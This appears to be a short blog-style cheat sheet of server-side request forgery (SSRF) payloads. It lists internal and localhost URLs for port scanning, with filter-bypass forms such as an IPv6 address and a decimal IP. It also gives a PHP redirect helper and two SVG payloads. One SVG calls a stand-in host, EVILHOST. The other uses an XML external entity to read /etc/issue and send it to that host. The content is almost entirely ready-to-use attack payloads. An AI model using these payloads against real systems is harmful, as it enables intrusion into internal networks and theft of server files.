=> SSRF
Port scanning
- http://scanme.nmap.org:22
-
Basic SSRF
- http://localhost:80
- https://localhost:80
- http://127.0.0.1:80
- http://127.127.127.127:80
Bypass filter technique
- http://[::]:80/
- http://2130706433/
- http://evilhost/ssrf.php?u=http://[::]:80/
<SSRF.php>
<?php
header("location: ".$_GET['u']);
?>
Eksternal SSRF via SVG file [LOW]
<?xml version=”1.0" encoding=”UTF-8" standalone=”no”?> <svg xmlns:svg=”http://www.w3.org/2000/svg" xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink" width=”200" height=”200"> <image height=”30" width=”30" xlink:href=”http://EVILHOST:1337/SVG-SSRF-TEST" /> </svg>
XXE via SVG File (Blind Internal SSRF) [CRITICAL]
<?xml version=”1.0" encoding=”UTF-8" standalone=”no”?> <!DOCTYPE ENTY [ <!ENTITY XXE SYSTEM “file:///etc/issue”> ]> <svg xmlns:svg=”http://www.w3.org/2000/svg" xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink" width=”200" height=”200"> <image height=”30" width=”30" xlink:href=”http://EVILHOST:1337/SSRF?&XXE;" /> </svg>
Komentar
Posting Komentar